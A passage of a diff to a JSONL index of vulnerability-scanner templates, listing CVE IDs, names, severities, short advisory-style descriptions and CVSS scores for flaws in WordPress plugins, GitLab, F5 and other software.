tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2020/CVE-2020-6287.yaml"} {"ID":"CVE-2020-6308","Info":{"Name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","Severity":"medium","Description":"SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-6308.yaml"} {"ID":"CVE-2020-6637","Info":{"Name":"OpenSIS 7.3 - SQL Injection","Severity":"critical","Description":"OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-6637.yaml"} +{"ID":"CVE-2020-6950","Info":{"Name":"Eclipse Mojarra - Local File Read","Severity":"medium","Description":"Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2020/CVE-2020-6950.yaml"} {"ID":"CVE-2020-7107","Info":{"Name":"WordPress Ultimate FAQ \u003c1.8.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-7107.yaml"} {"ID":"CVE-2020-7136","Info":{"Name":"HPE Smart Update Manager \u003c 8.5.6 - Remote Unauthorized Access","Severity":"critical","Description":"HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-7136.yaml"} {"ID":"CVE-2020-7209","Info":{"Name":"LinuxKI Toolset \u003c= 6.01 - Remote Command Execution","Severity":"critical","Description":"LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-7209.yaml"} @@ -950,6 +1018,7 @@ {"ID":"CVE-2020-8497","Info":{"Name":"Artica Pandora FMS \u003c=7.42 - Arbitrary File Read","Severity":"medium","Description":"Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-8497.yaml"} {"ID":"CVE-2020-8512","Info":{"Name":"IceWarp WebMail Server \u003c=11.4.4.1 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-8512.yaml"} {"ID":"CVE-2020-8515","Info":{"Name":"DrayTek - Remote Code Execution","Severity":"critical","Description":"DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-8515.yaml"} +{"ID":"CVE-2020-8615","Info":{"Name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","Severity":"medium","Description":"A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2020/CVE-2020-8615.yaml"} {"ID":"CVE-2020-8641","Info":{"Name":"Lotus Core CMS 1.0.1 - Local File Inclusion","Severity":"high","Description":"Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-8641.yaml"} {"ID":"CVE-2020-8644","Info":{"Name":"playSMS \u003c1.4.3 - Remote Code Execution","Severity":"critical","Description":"PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-8644.yaml"} {"ID":"CVE-2020-8654","Info":{"Name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","Severity":"high","Description":"EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-8654.yaml"} @@ -989,7 +1058,7 @@ {"ID":"CVE-2021-20323","Info":{"Name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-20323.yaml"} {"ID":"CVE-2021-20792","Info":{"Name":"WordPress Quiz and Survey Master \u003c7.1.14 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-20792.yaml"} {"ID":"CVE-2021-20837","Info":{"Name":"MovableType - Remote Command Injection","Severity":"critical","Description":"MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-20837.yaml"} -{"ID":"CVE-2021-21087","Info":{"Name":"Adobe ColdFusion - Remote Code Execution","Severity":"medium","Description":"Adobe ColdFusion is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-21087.yaml"} +{"ID":"CVE-2021-21087","Info":{"Name":"Adobe ColdFusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-21087.yaml"} {"ID":"CVE-2021-21234","Info":{"Name":"Spring Boot Actuator Logview Directory Traversal","Severity":"high","Description":"spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\".\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-21234.yaml"} {"ID":"CVE-2021-21287","Info":{"Name":"MinIO Browser API - Server-Side Request Forgery","Severity":"high","Description":"MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-21287.yaml"} {"ID":"CVE-2021-21307","Info":{"Name":"Lucee Admin - Remote Code Execution","Severity":"critical","Description":"Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-21307.yaml"} @@ -1022,6 +1091,7 @@ {"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"} {"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"} {"ID":"CVE-2021-22502","Info":{"Name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","Severity":"critical","Description":"Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22502.yaml"} +{"ID":"CVE-2021-22707","Info":{"Name":"EVlink City \u003c R8 V3.4.0.1 - Authentication Bypass","Severity":"critical","Description":"A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22707.yaml"} {"ID":"CVE-2021-22873","Info":{"Name":"Revive Adserver \u003c5.1.0 - Open Redirect","Severity":"medium","Description":"Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22873.yaml"} {"ID":"CVE-2021-22911","Info":{"Name":"Rocket.Chat \u003c=3.13 - NoSQL Injection","Severity":"critical","Description":"Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22911.yaml"} {"ID":"CVE-2021-22986","Info":{"Name":"F5 iControl REST - Remote Command Execution","Severity":"critical","Description":"F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22986.yaml"} @@ -1035,6 +1105,7 @@ {"ID":"CVE-2021-24176","Info":{"Name":"WordPress JH 404 Logger \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-24176.yaml"} {"ID":"CVE-2021-24210","Info":{"Name":"WordPress PhastPress \u003c1.111 - Open Redirect","Severity":"medium","Description":"WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24210.yaml"} {"ID":"CVE-2021-24214","Info":{"Name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24214.yaml"} +{"ID":"CVE-2021-24215","Info":{"Name":"Controlled Admin Access WordPress Plugin \u003c= 1.4.0 - Improper Access Control \u0026 Privilege Escalation","Severity":"critical","Description":"An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24215.yaml"} {"ID":"CVE-2021-24226","Info":{"Name":"AccessAlly \u003c3.5.7 - Sensitive Information Leakage","Severity":"high","Description":"WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24226.yaml"} {"ID":"CVE-2021-24227","Info":{"Name":"Patreon WordPress \u003c1.7.0 - Unauthenticated Local File Inclusion","Severity":"high","Description":"Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24227.yaml"} {"ID":"CVE-2021-24235","Info":{"Name":"WordPress Goto Tour \u0026 Travel Theme \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Goto Tour \u0026 Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24235.yaml"} @@ -1048,6 +1119,7 @@ {"ID":"CVE-2021-24278","Info":{"Name":"WordPress Contact Form 7 \u003c2.3.4 - Arbitrary Nonce Generation","Severity":"high","Description":"WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24278.yaml"} {"ID":"CVE-2021-24284","Info":{"Name":"WordPress Kaswara Modern VC Addons \u003c=3.0.1 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24284.yaml"} {"ID":"CVE-2021-24285","Info":{"Name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","Severity":"critical","Description":"The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24285.yaml"} +{"ID":"CVE-2021-24286","Info":{"Name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","Severity":"medium","Description":"The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24286.yaml"} {"ID":"CVE-2021-24287","Info":{"Name":"WordPress Select All Categories and Taxonomies \u003c1.3.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24287.yaml"} {"ID":"CVE-2021-24288","Info":{"Name":"WordPress AcyMailing \u003c7.5.0 - Open Redirect","Severity":"medium","Description":"WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24288.yaml"} {"ID":"CVE-2021-24291","Info":{"Name":"WordPress Photo Gallery by 10Web \u003c1.5.69 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24291.yaml"} @@ -1067,49 +1139,58 @@ {"ID":"CVE-2021-24389","Info":{"Name":"WordPress FoodBakery \u003c2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24389.yaml"} {"ID":"CVE-2021-24406","Info":{"Name":"WordPress wpForo Forum \u003c 1.9.7 - Open Redirect","Severity":"medium","Description":"WordPress wpForo Forum \u003c 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24406.yaml"} {"ID":"CVE-2021-24407","Info":{"Name":"WordPress Jannah Theme \u003c5.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24407.yaml"} +{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"} {"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"} {"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"} {"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"} -{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} +{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} {"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"} {"ID":"CVE-2021-24495","Info":{"Name":"Wordpress Marmoset Viewer \u003c1.9.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24495.yaml"} {"ID":"CVE-2021-24498","Info":{"Name":"WordPress Calendar Event Multi View \u003c1.4.01 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24498.yaml"} {"ID":"CVE-2021-24499","Info":{"Name":"WordPress Workreap - Remote Code Execution","Severity":"critical","Description":"WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24499.yaml"} {"ID":"CVE-2021-24510","Info":{"Name":"WordPress MF Gig Calendar \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24510.yaml"} {"ID":"CVE-2021-24554","Info":{"Name":"WordPress Paytm Donation \u003c=1.3.2 - Authenticated SQL Injection","Severity":"high","Description":"WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24554.yaml"} +{"ID":"CVE-2021-24627","Info":{"Name":"G Auto-Hyperlink \u003c= 1.0.1 - SQL Injection","Severity":"high","Description":"The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24627.yaml"} {"ID":"CVE-2021-24647","Info":{"Name":"Pie Register \u003c 3.7.1.6 - Unauthenticated Arbitrary Login","Severity":"high","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2021/CVE-2021-24647.yaml"} {"ID":"CVE-2021-24666","Info":{"Name":"WordPress Podlove Podcast Publisher \u003c3.5.6 - SQL Injection","Severity":"critical","Description":"WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social \u0026 Donations module, not activated by default, adds the REST route /services/contributor/(?P\u003cid\u003e[\\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24666.yaml"} {"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"} {"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"} {"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"} {"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"} +{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"} {"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"} {"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"} {"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify 